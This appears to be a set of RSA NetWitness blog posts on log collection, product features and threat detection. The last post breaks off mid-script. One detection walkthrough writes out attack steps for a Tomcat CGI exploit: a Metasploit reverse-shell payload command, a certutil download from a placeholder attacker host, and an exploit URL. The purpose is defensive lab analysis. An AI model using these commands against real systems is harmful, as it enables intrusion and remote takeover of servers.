
If you need to achieve high availability (HA) through load balancing and failover for VLCs (Virtual Log Collectors) on AWS, you can use the built-in AWS load balancer. I have tested this scenario, so I am going to share the outcome here.

 

Before starting, I need to state that VLC failover/balancing is not officially supported RSA functionality. Furthermore, this can only work with "push" collections such as syslog, SNMP, etc. It does not work with "pull" collections such as Windows, Check Point, ODBC, etc. (at least not that I am aware of; I have personally never tested it).

 

That being said, let's get started.

 

As you may be aware, in AWS EC2 you have separate geographic areas called Regions (I am using US East - N. Virginia here), and within regions you have different isolated locations called Availability Zones.

 

 

We are going to leverage this concept and place the two VLCs into two different Availability Zones. If one VLC fails, the VLC in the other Availability Zone will take over.

 

The following diagram helps illustrate the scenario (for better clarity I omitted the data flow from the VLCs to the Log Decoder(s)):

 

Assuming you have already deployed the two VLC instances, the next step is to create two different subnets and associate a different Availability Zone with each of them.

 

  • From the AWS Virtual Private Cloud (VPC) menu go to Subnets and start creating the two subnets:

 

 

  • Next we need to create a Target Group (from the EC2 menu) which will be used to route requests to our registered targets (the VLCs):

     

 

  • Finally, we need to create the load balancer itself. For this specific test I used a Network Load Balancer, though I think an Application Load Balancer would work too. I selected an internal balancer. I chose syslog on TCP port 514, so I created a listener for that. The AWS load balancer does not support UDP, so I was forced to use TCP; however, I would have used syslog over TCP anyway, as it is more robust and reliable and allows large syslog messages to be transferred (especially in a production environment). I also selected the appropriate VPC and the Availability Zones (and subnets) accordingly.

     

 

In the advanced health check settings I chose to use port 5671 (by default the balancer would have used the same port as the listener, 514). The reason for using 5671 is that the whole log collection mechanism works with RabbitMQ, which uses this port. In fact, the only scenarios in which port 514 would fail are when the VLC instance is down or when we stop the syslog collection. RabbitMQ is more prone to failure and may fail in more scenarios, such as queues filling up because the decoder is not consuming the logs, full partitions, network issues, etc.

 

 

  • Once the load balancer configuration is finished you will see something similar to this:

 

 

           We need to take note of the DNS A record, as this is the address our event sources will use to send syslog traffic to.

 

  • Now, to configure an event source to send syslog to the load balancer, you just need to point the event source to the load balancer's DNS A record. As an example, for a Red Hat Linux machine you would edit the /etc/rsyslog.conf file as follows:

 

  

 

         We are using @@ because the transport is TCP; for UDP it is just one @.
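         As a minimal sketch, the forwarding line in /etc/rsyslog.conf might look like the following (the load balancer DNS name below is a placeholder; substitute the A record noted earlier):

             # forward all facilities/severities to the load balancer over TCP port 514
             *.* @@my-nlb-1234567890.elb.us-east-1.amazonaws.com:514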

 

         Then we need to restart the rsyslog service as follows:

 

            --> service rsyslog restart (Red Hat 6)

            --> systemctl restart rsyslog (Red Hat 7)

 

  • To perform a more accurate and controlled test and demonstration, I am installing a tool on the same event source and will push some rhlinux logs to the load balancer to see what happens. The tool is RSA-proprietary and is called NwLogPlayer (more details here: How To Replay Logs in RSA NetWitness). It can be installed via yum if you have enabled the RSA NetWitness repo:

 

   

 

      I also prepared an rhlinux sample log file with 14,000 events, and I am going to inject these into the load balancer and see what happens. Initially my Log Decoder LogStats page is empty:
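      A hedged sketch of the commands involved (the flags below reflect typical NwLogPlayer usage but may vary by version; check nwlogplayer --help, and note the sample file name is a placeholder):

          # install from the RSA NetWitness repo
          yum install rsa-nw-logplayer
          # replay the sample file to the load balancer's DNS A record over TCP 514
          nwlogplayer -f rhlinux.log -s my-nlb-1234567890.elb.us-east-1.amazonaws.com -p 514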

 

  

 

      Then I start with the first push of the 14,000 events:

 

 

      Now I can see the first 14,000 events went to VLC2 (172.24.185.126):

 

      At my second push I can see the whole chunk going to VLC1 (172.24.185.105):

 

      At the third push the logs went again to VLC2

 

     At the fourth push the logs went to VLC1

 

      At the fifth push, I sent 28,000 events (almost simultaneously) and they were divided between both VLCs:

 

     This demonstrates that the load has been balanced equally between the two VLCs.

 

      Now I stop VLC1 (I actually stopped the rabbitmq service on VLC1) and push another 14,000 logs:

 

     and again

 

      In both instances above, VLC2 received the two chunks of 14,000 logs since VLC1 was down. We can safely say that failover is working fine!

Note: This configuration is not officially supported by RSA customer support. 

I have recently been posting a number of blogs regarding the usage of the RSA NetWitness Platform to detect attackers within your environment. As the list of blogs grows, it is becoming increasingly difficult to navigate through them easily. To combat this, this blog post will contain references to all other blog posts in the Profiling Attackers Series, and will be updated when new posts are made.


Special thanks to Rui Ataide for his support and guidance for these posts.

Introduction

Cobalt Strike is a threat emulation tool used by red teams and advanced persistent threats for gaining and maintaining a foothold on networks. This blog post will cover the detection of Cobalt Strike based on a piece of malware identified on VirusTotal:

 

NOTE: The malware sample was downloaded and executed in a malware VM under the analyst's constant supervision, as this was/is live malware.

The Detection in NetWitness Packets

NetWitness Packets pulls apart characteristics of the traffic it sees. It does this via a number of Lua parsers that reside on the Packet Decoder itself. Some of the Lua parsers have options files associated with them that parse out additional metadata for analysis. One of these is the HTTP Lua parser, which has an associated HTTP Lua options file; you can view this by navigating to Admin ⮞ Services ⮞ Decoder ⮞ Config ⮞ Files and selecting HTTP_lua_options.lua from the drop-down. The option we are interested in for this blog post is headerCatalog() - making this return true will register the HTTP headers in the request and response under the meta keys:

  • http.request
  • http.response

 

And the associated values for the headers will be registered under:

  • req.uniq
  • resp.uniq

 

NOTE: This feature is not available in the default options file due to potential performance considerations it may have on the Decoder. This feature is experimental and may be deprecated at any time, so please use this feature with caution, and monitor the health of all components if enabling. Also, please look into the customHeader() function prior to enabling this, as that is a less intensive substitute that could fit your use cases.
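As a sketch, enabling the option in HTTP_lua_options.lua looks something like the following (this assumes the options file's convention of option functions returning a value; verify against the copy on your Decoder):

    function headerCatalog()
        -- register request/response header names under http.request / http.response,
        -- and their values under req.uniq / resp.uniq
        return true
    end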

 

There are a variety of options that can be enabled here. For more details, it is suggested you read the Hunting Guide: https://community.rsa.com/docs/DOC-62341.

 

These keys will need to be indexed on the Concentrator, and the following addition to the index-concentrator-custom.xml file is suggested:

<key description="HTTP Request Header" format="Text" level="IndexValues" name="http.request" defaultAction="Closed" valueMax="5000" />
<key description="HTTP Response Header" format="Text" level="IndexValues" name="http.response" defaultAction="Closed" valueMax="5000" />
<key description="Unique HTTP Request Header" level="IndexKeys" name="req.uniq" format="Text" defaultAction="Closed"/>
<key description="Unique HTTP Response Header" level="IndexKeys" name="resp.uniq" format="Text" defaultAction="Closed"/>

 

 

The purpose of this, amongst others, is that the trial version of Cobalt Strike has a distinctive HTTP header that we, as analysts, would like to see: https://blog.cobaltstrike.com/2015/10/14/the-cobalt-strike-trials-evil-bit/. This HTTP header is X-Malware, and with our new option enabled, this header is easy to spot:

NOTE: While this is one use case to demonstrate the value of extracting the HTTP headers, this metadata proves incredibly valuable across the board, as looking for uncommon headers can help lead analysts to uncover and track malicious activity. Another example where this was useful can be seen in one of the previous posts regarding PoshC2, whereby an application rule was created to look for the incorrectly supplied cachecontrol HTTP response header: https://community.rsa.com/community/products/netwitness/blog/2019/03/04/command-and-control-poshc2

 

Pivoting off this header and opening the Event Analysis view, we can see an HTTP GET request for KHSw, which was direct to IP over port 666 and had a low header count with no referrer. This should stand out as suspicious even without the initial indicator we used for analysis:

 

If we had decided to look for traffic using the Service Analysis key, which pulls apart the characteristics of the traffic, we would have been able to pivot off of these metadata values to whittle down our traffic to this as well:

 

Looking into the response for the GET request, we can see the X-Malware header we pivoted off of, and the stager being downloaded. Also, take notice of the EICAR test string in X-Malware; this is indicative of a trial version of Cobalt Strike:

 

NetWitness Packets also has a parser to detect this string, and will populate the metadata, eicar test string, under the Session Analysis meta key (if the Eicar Lua parser is pushed from RSA Live) - this could be another great pivot point to detect this type of traffic:

 

Further looking into the Cobalt Strike traffic, we can start to uncover more details surrounding its behaviour. Upon analysis, we can see that there are multiple HTTP GET requests with no error (i.e. 200) and a content-length of zero, which stands out as suspicious behaviour. As well as this, there is a cookie that looks like a Base64-encoded string (equals signs at the end for padding) with no name/value pairs. Cookies normally consist of name/value pairs, so these two observations make the cookie anomalous:

 

Based off of this behaviour, we can start to think about how to build content to detect it. Heading back to our HTTP Lua options file on the Decoder, we can see another option named customHeaders(). This allows us to extract the values of HTTP headers into meta keys of our choosing. This means we can choose to extract the cookie into a meta key named cookie, and content-length into a key named http.respsize, mapping specific HTTP header values to keys so we can create content based off of the behaviours we previously observed:

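A sketch of what that mapping might look like in HTTP_lua_options.lua (the exact table format can differ between versions of the options file, so treat this as illustrative rather than authoritative):

    function customHeaders()
        return {
            ["cookie"] = "cookie",                 -- Cookie header values -> 'cookie' key
            ["content-length"] = "http.respsize"   -- Content-Length values -> 'http.respsize' key
        }
    end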
 

After making the above change, we need to add the following keys to our index-concentrator-custom.xml file as well. These are set to an index level of IndexKeys, as the values that can be returned are unbounded and we don't want to bloat the index:

<key description="Cookie" format="Text" level="IndexKeys" name="cookie" defaultAction="Closed"  />
<key description="HTTP Response Size" format="Text" level="IndexKeys" name="http.respsize" defaultAction="Closed" />

 

Now we can work on creating our application rules. Firstly, we wanted to alert on the suspicious GET requests we were seeing:

service = 80 && action = 'get' && error !exists && http.respsize = '0' && content='application/octet-stream'

And for the anomalous cookie, we can use the following logic. This will look for no name/value pairs being present and the use of equals signs at the end of the string, which can indicate padding for Base64-encoded strings:

service = 80 && cookie regex '^[^=]+=*$' && content='application/octet-stream'

These will be two separate application rules that will be pushed to the Decoders:

 

Now we can start to track the activity of Cobalt Strike easily in the Investigate view. This could also potentially alert the analyst to other infected hosts in their environment. This is why it is important to analyse the malicious traffic and create content to track:

 

Conclusion

Cobalt Strike is a very malleable tool. This means that the indicators we have used here will not detect all instances of Cobalt Strike; with that being said, this is known, common Cobalt Strike behaviour. This blog post was intended to showcase how the HTTP Lua options file can be instrumental in identifying anomalous traffic in your environment, using real-world live malware. The extraction of the HTTP headers, whilst a trivial piece of information, can be vital in detecting advanced tools used by attackers. This, coupled with the extraction of the values themselves, can help your analysts create more advanced, higher-fidelity content.

Preface
In order to prevent confusion, I wanted to add a little snippet before we jump into the analysis. This blog post first goes over how the server became infected with Metasploit: the attacker used a remote code execution CVE against an Apache Tomcat web server, the details of which can be found here: https://nvd.nist.gov/vuln/detail/CVE-2019-0232. Further into the blog post, details of Metasploit can be seen.

 

This CVE requires that the CGI Servlet in Apache Tomcat is enabled. This is not an abnormal servlet to have enabled, and it merely requires the administrator to uncomment a few lines in the Tomcat web.xml. This is a normal administrative action to have taken on the web server:

  
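For reference, the stock Tomcat web.xml ships with a CGI servlet definition along these lines commented out (a sketch based on the standard distribution; note that for the RCE to work, the servlet's enableCmdLineArguments option must also be true on affected versions):

    <servlet>
        <servlet-name>cgi</servlet-name>
        <servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
        <init-param>
            <param-name>cgiPathPrefix</param-name>
            <param-value>WEB-INF/cgi</param-value>
        </init-param>
    </servlet>
    <servlet-mapping>
        <servlet-name>cgi</servlet-name>
        <url-pattern>/cgi-bin/*</url-pattern>
    </servlet-mapping>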


Now, if the administrator has a .bat or .cmd file in the cgi-bin directory on the Apache Tomcat server, the attacker can remotely execute commands, as Tomcat will call cmd.exe to execute the .bat or .cmd file and incorrectly handle the parameters passed. This file can contain anything, as long as it executes. So here, as an example, we place a simple .bat file in the cgi-bin directory:

 

From a browser, the attacker can call the .bat file and pass a command to execute, due to the way the CGI Servlet handles this request and passes the arguments:

 
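A hypothetical example of such a request, using the hello.bat file seen later in this post (the ?&<command> pattern is the commonly documented proof-of-concept form for this CVE):

    http://<tomcat_server>:8080/cgi-bin/hello.bat?&dir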

From here, the attacker can create a payload using msfvenom and instruct the web server to download the Metasploit payload they created:

 
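As a sketch, the payload generation and download might look something like the following (the LHOST/LPORT values are placeholders; the post later shows certutil acting as the downloader for a.exe):

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f exe -o a.exe
    certutil -urlcache -split -f http://<attacker_ip>/a.exe C:\temp\a.exe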

The Detection in NetWitness Packets

RCE Exploit
NetWitness Packets does a fantastic job of pulling apart the behaviour of network traffic. This allows analysts to detect attacks even with no prior knowledge of them. A great meta value for analysts to look at is windows cli admin commands; this metadata is created when CLI commands are detected. Grouping this metadata with inbound traffic to your web servers is a great pivot point to start looking for malicious traffic:

 

NOTE: Taking advantage of the traffic_flow_options.lua parser would be highly beneficial for your SOC. This parser allows you to define your subnets and tag them with friendly names. Editing this to contain your web servers' address space, for example, would be a great idea.

 

Taking the above note into account, your analysts could then construct a query like the following:
(analysis.service = 'windows cli admin commands') && (direction = 'inbound') && (netname.dst = 'webservers')
Filtering on this metadata reduces the traffic quite significantly. From here, we can open up other meta keys to get a better understanding of what traffic is related to these Windows CLI commands. From the below screenshot, we can see that this is HTTP traffic with a GET request to a hello.bat file in the /cgi-bin/ directory; there are also some suspicious-looking queries associated with it that appear to reference command line arguments:

 

At this point, we decide to reconstruct the raw sessions themselves, as we have some suspicions surrounding this traffic, to see exactly what these HTTP sessions are. Upon doing so, we can see a GET request with the dir command, and we can also see the dir output in the response; this is what the windows cli admin commands metadata was picking up on:

 

This traffic instantly stands out as something of interest that requires further investigation. In order to get a holistic view of all data toward this server, we need to reconstruct our query, as the windows cli admin commands metadata would only have picked up on the sessions where it saw CLI commands; we are, however, interested in seeing it all. So we look at the metadata available for this session and build a new query. This now allows us to see other interesting metadata and get a better idea of what the attacker was doing. Looking at the Query meta key, we can see all of the attacker's commands:

 

Navigating to the Event Analysis view, we can see the commands in the order they took place and reconstruct what the attacker was doing. From here we can see a sequence of events whereby the attacker makes a directory, C:\temp, downloads an executable called 2.exe to said directory, and subsequently executes it:

 

MSF File and Traffic

As well as the attacker's commands, we can also see the download of an executable they performed, a.exe. This means we can run a query and extract that file from the packet data as well. We run a simple query looking for a.exe, and we find our session. Also, take note of the user agent: why is certutil being used to download a.exe? This is also a great indicator of something suspicious:

 

We can also choose to switch to the File Analysis view and download our file(s). This would allow us to perform additional analysis on the file(s) in question:

 

Merely running strings on one of these files yields a domain this executable may potentially connect to:

 
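For example (a sketch; the grep pattern is just one quick way to surface network indicators in the output):

    strings a.exe | grep -iE "(http|\.com|\.net)"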

As we now have another hostname to add to our analysis, we can perform a query on just this hostname to see if there is any other interesting metadata associated with it. Opening the Session Analysis meta key, we can see a myriad of interesting pivot points. We can group these pivot points together, or make combinations of them, to whittle down the traffic to something more manageable:

NOTE: See the RSA IR Hunting guide for more details on these metadata values: https://community.rsa.com/docs/DOC-62341

 

Once we have pivoted down using some of the metadata above, we get down to a more manageable number of sessions. Continuing to look at the Service Analysis meta key, we observe some additional pieces of metadata of interest we can use to start reconstructing the sessions and get a better understanding of what this traffic is:

 

  • long connection
  • http no referer
  • http six or less headers
  • http post missing content-type
  • http no user-agent
  • watchlist file fingerprint

 

 

Opening these sessions up in the Event Analysis view, we can see an HTTP POST with binary data and a 200 OK from the supposed Apache server; we can also see the directory is the same as the one we saw in our strings analysis:

 

Continuing to browse through these sessions yields more of the same:

 

Navigating back to the Investigate view, it is also possible to see that the directory is always the same one we saw in our strings analysis:

 

NOTE: During the analysis, no beaconing pattern was observed. This can make the C2 harder to detect, and it requires continued threat hunting from your analysts to understand your environment and pick up on these types of anomalies.

 

Web Shell

Now we know that the Apache Tomcat web server is infected, we can look at all other traffic associated with the web server and continue to monitor whether anything else takes place; attackers like to keep multiple entry points if possible. Focusing on our web server, we can also see a JSP page being accessed that sounds odd, error2.jsp, and observe some additional queries:

 

Pivoting into the Event Analysis view and reconstructing the sessions, we can see a tasklist command being executed:

 

And the subsequent response of the tasklist output. This is a web shell that has been placed on the server, which the attacker is also using to execute commands:

 

NOTE: For more information on Web Shells, see the following series: https://community.rsa.com/community/products/netwitness/blog/2019/02/12/web-shells-and-netwitness

 

It is important to note that just because you have identified one method of remote access, it does not mean it is the only one; it is important to ascertain whether or not other access methods were made available by the attacker.

 

The Detection in NetWitness Endpoint
As I preach in every blog post, the analyst should always log in every morning and check the following three meta keys as a priority: IOC (Indicators of Compromise), BOC (Behaviours of Compromise), and EOC (Enablers of Compromise). Looking at these keys, a myriad of pieces of metadata stand out as great places to start the investigation, but let's place a focus on these three for now:

 

Let's take the downloads binary using certutil meta value to start, and pivot into the Event Analysis view. Here we can see the certutil binary being used to download a variety of the executables we saw in the packet data:

 

Looking into one of the other behaviours of compromise, http daemon runs command shell, we can also see evidence of the .bat file being requested along with the associated commands, as well as the use of the web shell, error2.jsp. It is also important to note that there is a request for hello.bat prior to the remote code execution vulnerability being exploited; this would be seen as legitimate traffic, given that the server is working as designed for the cgi-bin scripts. It is down to the analyst to review the traffic and decipher whether something malicious is happening, or whether this is by design of the server:

 

NOTE: Due to the nature of how the Tomcat server handles the vulnerable cgi-bin application and "legitimate" JSP files, you can see hello.bat as part of the tracking event, as it is an argument passed to cmd.exe. With error2.jsp, however, the page is executed inside the Tomcat process, so you will only see cmd.exe being executed when the web shell spawns a new command shell to run certain commands, and not every time error2.jsp is used. Having said that, the advantage for the defender is that even if not all of the activity is tracked or leaves a visible footprint, at some point something will, and this can be the starting thread needed to detect the intrusion.

 

Coming back to the Investigate view, we can see another interesting piece of metadata, creates remote service. Let's pivot on this and see what took place:

Here we can see that cmd was used to create a service on our web server that would run a malicious binary dropped by the attacker in the C:\temp directory:

 

It is important to remember that as a defender, you only need to pick up on one of these artifacts left over from the attacker in order to start unraveling their activity.

 

Conclusion
With today's ever-changing landscape, it is becoming increasingly inefficient to create signatures for known vulnerabilities and attacks. It is therefore far more important to pick up on traffic behaviours that stand out as abnormal than to generate signatures. As shown in this blog post, a fairly recent remote code execution CVE was exploited (https://nvd.nist.gov/vuln/detail/CVE-2019-0232), and no signatures were required to pick up on it, as NetWitness pulls apart the behaviours; we just had to follow the path. Similarly, with Metasploit it is very difficult to generate effective, long-lived signatures that could detect this C2; performing threat hunting through the data based on a foundation of analysing behaviours will ensure that all knowns and unknowns are effectively analysed.

 

It is also important to note that the packet traffic would typically be encrypted, but we kept it in the clear for the purposes of this post. With that being said, the RCE exploit and web shell are easily detectable when NetWitness Endpoint tracking data is being ingested, and this allows the defender to have the necessary visibility if SSL decryption is not in place.

Summary

A vulnerability exists within Remote Desktop Services that may be exploited by sending crafted network requests using RDP. The result could be remote code execution on a victim system without any user authentication or interaction. The vulnerability, CVE-2019-0708, is not known to have been publicly exploited; however, expectations are that it will be. Follow the Microsoft advisory to patch vulnerable systems: CVE-2019-0708 | Remote Desktop Services Remote Code Execution Vulnerability.

 

Live Content

The RSA Threat Content Team has added detection for NetWitness packet customers based on the work of the NCC Group. To get the detection, update your Decoders with the latest version of the RDP Lua parser (dated May 22nd, 2019).

 

If an exploit has been detected, meta will be output to the NetWitness Investigation page as:

 

ioc = 'possible CVE-2019-0708 exploit attempt'

 

You may also see the exploitation by deploying rules to the NetWitness ESA product and viewing the Respond workflow for alerts. Deploy the following rules from Live to ESA:

 

  • RDP Inbound
  • RDP from Same Source to Multiple Destinations

 

RDP Inbound may catch the initial connection from the attacker. It is expected the infection would be worm-like, moving to internally networked systems. In that case, the second rule, RDP from Same Source to Multiple Destinations, may catch the behavior. Please note you must be monitoring lateral traffic within your network for this detection.

 


In 11.3, the same NWE agent can operate in Insights (free) or Advanced mode. This change can be made by toggling a policy configuration in the UI and does not require an agent reinstall or reboot.

There can be both Insights and Advanced agents in a single deployment. Only agents operating in Advanced mode count toward licensing.

 

Feature (comments): release availability (NetWitness 11.3 and/or NWE 4.x)

  • Basic scans (inventory): 11.3, 4.x
  • Tracking scans (continuous file, network, process, and thread monitors; registry monitor, Windows-specific): 11.3, 4.x
  • Anomaly detection (inline hooks, kernel hooks, suspicious threads, registry discrepancies): 11.3, 4.x
  • Windows Log Collection (collect Windows Event Logs): 11.3**
  • Threat Detection Content (detection rules/reports): 11.3
  • Risk score (based on Threat Content Pack): 11.3, 4.x
  • File Reputation Service (file intel, 3rd-party lookup): 11.3, 4.x
  • Live Connect (community intel): 11.3, 4.x
  • Analyze module (analysis of downloaded files): 11.3, 4.x
  • Blocking (block an executable): 11.3, 4.x
  • Agent Protection (driver registry protection / user-mode kill protection): 11.3**
  • PowerShell and command-line input (report user interactions within a console session): 11.3**
  • Process Visualization (unique identifier (VPID) for a process that uniquely identifies the entire process event chain): 11.3**
  • MFT Analysis: future for 11.3, available in 4.x
  • Process Memory Dump: future for 11.3, available in 4.x
  • System Memory Dump: future for 11.3, available in 4.x
  • Request File: future for 11.3, available in 4.x
  • Automatic File Downloads: future for 11.3, available in 4.x
  • Standalone Scans: future for 11.3, available in 4.x
  • RAR: future for 11.3, available in 4.x
  • Containment: future for 11.3, available in 4.x
  • API Support: future for 11.3, available in 4.x
  • Certificate CRL Validation: future for 11.3, available in 4.x

** - New capabilities; these do not exist in 4.x

 

 

11.3 Key Endpoint Features

1. Advanced Endpoint Agent
   Value: Full and continuous endpoint visibility; advanced threat detection / threat hunting
   Details: Performs both kernel- and user-level analysis:
   • Tracks behaviors such as process creation, remote thread creation, relevant registry key modifications, executable file creation, and processes that read documents (refer to the documentation for the detailed list)
   • Tracks network events
   • Tracks console events (commands typed into a console such as cmd)
   • Windows log collection
   • Detects anomalies such as image hooks, kernel hooks, suspicious threads, and registry discrepancies
   • Retrieves lists of drivers, processes, DLLs, files (executables), services, autoruns, host file entries, and scheduled tasks
   • Gathers security information such as network shares, patch level, Windows tasks, logged-in users, and bash history
   • Reports the hashes (SHA-256, SHA-1, MD5) and file size of all binaries (executables, libraries (DLL and .SO), and scripts) found on the system
   • Reports details on certificates, signers, file descriptions, executable sections, imported libraries, etc.

2. Threat Content Packs
   Value: Detection of adversary tactics and techniques (MITRE ATT&CK matrix)
   Details: See the attached 11.3 Endpoint Rules spreadsheet

3. Risk Scoring
   Value: Prioritized list of risky hosts/files; automated incident creation for hosts/files when the risk threshold is exceeded; risk score backed by the context of contributing factors; rapid/easy investigation workflow
   Details: Risk scores are computed by a proprietary scoring algorithm developed by RSA's Data Sciences team. The scoring server takes multiple factors into consideration:
   • Critical, high, and medium indicators generated by the endpoints based on the threat content packs deployed
   • Reputation status of files (malicious/suspicious)
   • Bias status of files (blacklisted/greylisted/whitelisted)

4. Process Visualizations
   Value: Provides a visualization of a process and its parent-child relationships; a timeline of all activities related to a process

5. File Analysis / Reputation / Bias Status
   Value: Categorizes files; saves analysis time, filters out noise, focuses on real threats
   Details: File hashes from the environment are sent to the RSA Threat Intel Cloud for reputation status updates; Live Connect lookup in Investigations

6. Response Actions - File Blocking
   Value: Accelerates response / prevents malware execution
   Details: Blocks a file hash across the environment

7. Response Actions - Retrieve Files
   Value: Download and analyze file contents for anomalies; static analysis using 3rd-party tools

8. Centralized Group Policy Management
   Value: Agent configurations updated dynamically based on group membership
   Details: Groups can be created based on different criteria such as IP address, hostname, operating system type, and operating system description. Endpoint policies such as agent mode, scan schedule, server settings, and response actions can be automatically pushed based on group membership. Agents can be migrated to different Endpoint Servers based on group/policy assignment.

9. Geo-Distributed Scalable Deployment
   Value: Consolidated view and management of endpoints/files and the associated risk across distributed deployments

Strides have been made in RSA NetWitness Platform v11.2 to provide administrators with alternatives to the standard proprietary NetWitness database format. An admin can now choose to have the raw packet database files written in PcapNg format, allowing them to be directly accessible using third-party tools like Wireshark.

 

To enable storing the raw packet data as PcapNg files, the packet.file.type setting in the Network Decoder's database configuration node has to be changed from netwitness to pcapng. After making this change, a restart of the service is not required, unless you are too impatient to wait for the existing database file (default size is 4GB) to roll over.

 

PcapNg configuration

 
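If you prefer the service's REST interface over the UI shown above, a hedged sketch of the same change (this assumes the Decoder's REST port of 50104 and the standard msg=set convention; the exact node path is best confirmed in the Explore view):

    curl -u admin "http://<decoder_host>:50104/database/config/packet.file.type?msg=set&value=pcapng"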

Once the change is applied, any new PCAPs uploaded or network traffic ingested into the decoder will be stored as PcapNg files. As the database files age, they are now more readily accessible, both while on the decoder and when backed up off the system. In the below image you can see a mixture of the formats commingling in the packet database folder. The written database format can be changed between the two options without any loss of standard functionality.

 

pcapng files

 

There are some considerations before making the switch to the PcapNg format from the default nwpdb format. The PcapNg format requires approximately 5% more storage than the nwpdb format. The PcapNg format is not recommended when ingest rates are greater than 8 Gbps on a single decoder, as it can introduce approximately 5% packet drops compared to when nwpdb is in use. PcapNg files cannot be compressed while nwpdb files can, although in general raw network data does not compress well compared to raw logs. The PcapNg format is an open format while nwpdb is proprietary, so as accessibility improves, privacy concerns may arise when storing data as PcapNg files. However, I am not suggesting security through obscurity is the right answer when measuring your GDPR compliance.

 

Hopefully this, along with the already available SDK and APIs, makes NetWitness data more accessible.

One of the more common requests and "how do I" questions I've heard in recent months centers around the emails that the Respond module can send when an incident is created or updated.  Enabling this configuration is simple (https://community.rsa.com/docs/DOC-86405), but unfortunately, changing the templates that Respond uses when it sends one of these emails has not been an option.

 

Or rather...has not been an accessible option.  I aim to fix that with this blog post.

 

Before getting into the weeds, I should note that this guide does not cover how to include *any* alert data within incident notification emails. The fields I have found in my tests that can be included are limited to these, using JSON dot notation (e.g. "incident.id", "incident.title", "incident.summary", etc.):

 

Now, this does not necessarily mean it isn't possible to include other data, just that I have not figured out how...yet.

 

The first thing we need to do is create a new Notification Template for Respond to use.  We do this within the UI at Admin / System / Global Notifications --> Templates tab.  I recommend using either of the existing Respond Notification templates as a base, and then modifying either/both of those as necessary. (I have attached these OOTB notification templates to this blog.)

 

For this guide, I'll use the "incident-created" template as my base, and copy that into a new Notification Template in the UI.  I give my template an easy-to-remember name, choose any of the default Template Types from the dropdown - it does not matter which I choose, as it won't have any bearing on the process, but it's a required field and I won't be able to save the template without selecting one - and write in a description:

 

Then I copy the contents of the "incident-created" template into the Template field.  The first ~60% of this template is just formatting and comments, so I scroll past all that until I find the start of the HTML <body> tag.  This is where I'll be making my changes.

 

One of the more useful changes that comes to mind here is to include a hyperlink in the email that will allow me to pivot directly from the email to the Incident in NetWitness.  I can also change any of the static text to whatever fits my needs.  Once I'm done making my changes, I save the template.
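As an illustration, such a hyperlink might look like this inside the template's HTML body (a sketch using the template's FreeMarker variables; the Respond route and hostname are placeholders to adjust for your deployment):

    <a href="https://<NW_Admin_Server>/respond/incident/${incident.id}">View ${incident.id} in NetWitness</a>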

 

After this, I'm done in the UI (unless I decide to make additional changes to my template), and I open an SSH session to the NetWitness Admin Server.  To make this next part as simple and straightforward as I can, I've written a script that will prompt me for the name of the template I just created, use that to make a new Respond notification template, and then prompt me one more time to choose which Respond notification event (Created or Updated) I want to apply it to. (The script is attached to this blog.)

 

A couple notes on running the script:

  1. Must be run from the Admin Server
  2. Must be run as a superuser

 

Running the script:

 

...after a wall of text because my template is fairly long...I get a prompt to choose Created or Updated:

 

And that's it!  Now, when a new incident gets created (either manually or automatically) Respond sends me an email using my custom Notification Template:

 

And if I want to update or fix or modify it in any way, I simply make my changes to the template within the UI and then run this script again.

 

Happy customizing.

Hi Everyone,

We're excited to share our second issue of the RSA NetWitness Platform newsletter with you.  As a friendly reminder, the goal for this newsletter is to share more information about what is happening and what key things you should be aware of regarding our products and services.

 

This is a monthly newsletter, so you can expect the next newsletter in early June.  If you have any specific topics you would like to see in a future newsletter, please let us know!

 

Previous Newsletters:

 

 

Note: You can hit "preview" to view the pdf newsletter in your browser window, without needing to download it. 

One of the features included in the RSA NetWitness 11.3 release is something called Threat Aware Authentication (Respond Config: Configure Threat Aware Authentication).  This feature is a direct integration between RSA NetWitness and RSA SecurID Access that enables NetWitness to populate and manage a list of potentially high-risk users that SecurID Access can then refer to when determining whether (and how) to require those users to authenticate.

 

The configuration guide above details the steps required to implement this feature in the RSA NetWitness Platform, and the relevant SecurID documentation for the corresponding capability is here: Determining Access Requirements for High-Risk Users in the Cloud Authentication Service.

 

On the NetWitness side, to enable this feature you must be at version 11.3 and have the Respond Module enabled (which requires an ESA), and on the SecurID Access side, you need to have Premium Edition (RSA SecurID Access Editions - check the Access Policy Attributes table at the bottom of that page).

 

At a high level, the flow goes like this:

  1. NetWitness creates an Incident
  2. If that Incident has an email address (one or more), the Respond module sends the email address(es) via HTTP PUT to the SecurID Access API (a sketch of this call follows the list)
  3. SecurID Access checks the domains of those email addresses against its Identity Sources (AD and/or LDAP servers)
  4. SecurID Access adds those email addresses with matching domains to its list of High Risk Users
  5. SecurID Access can apply authentication policies to users in that list
  6. When the NetWitness Incident is set to Closed or Closed-False Positive, the Respond module sends another HTTP PUT to the SecurID Access API removing the email addresses from the list
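To make step 2 concrete, the PUT is conceptually something like the following. This is a hypothetical sketch only: the endpoint path and body schema are illustrative placeholders, and the real API authenticates with a signed JWT derived from your API key (the script below shows a working approach):

    curl -X PUT "https://<URL_of_your_SID_Access_Cloud_Console_API>/v1/users/highrisk" \
      -H "Authorization: Bearer <JWT_from_API_key>" \
      -H "Content-Type: application/json" \
      -d '{"emails": ["user@example.com"]}'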

 

In trying out these capabilities, I ended up making a couple tools to help report on some of the relevant information contained in NetWitness and SecurID Access.

 

The first of these is a script (sidHighRiskUsers.py; attached at the bottom of this blog) to query the SecurID Access API in the same way that NetWitness does.  This script is based on the admin_api_cli.py example in the SecurID Access REST API tool (https://community.rsa.com/docs/DOC-94122).  That download contains all the python dependencies and modules necessary to interact with the SecurID API, plus some helpful README files, so if you do intend to test out this capability I recommend giving that a look.

 

Some usage examples of this script (can be run with either python2 or python3 or both, depending on whether you've installed all the dependencies and modules in the REST API tool):

 

Show Users Currently on the High Risk List

# python highRiskUsers.py -f /path/to/SIDAccess/API.key -o getHighRiskUsers -u "https://<URL_of_your_SID_Access_Cloud_Console_API>"

 

 

Add  Users to the High Risk List

# python highRiskUsers.py -f /path/to/SIDAccess/API.key -o addHighRiskUsers -u "https://<URL_of_your_SID_Access_Cloud_Console_API>" -e <single_or_multiple_email_address>

 

**Note: my python-fu is not strong enough to capture/print the 404 response from the API if you send a partially successful PUT.  If your python-fu is strong, I'd love to know how to do that correctly.

Example: if you try to add multiple user emails and one or more of those emails are not in your Identity Sources, you should see this error for the invalid email(s):

 
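One possible approach, assuming the script issues its PUT via the requests library (a sketch with placeholder URL, payload, and headers, not a verified fix for the script above):

    import requests

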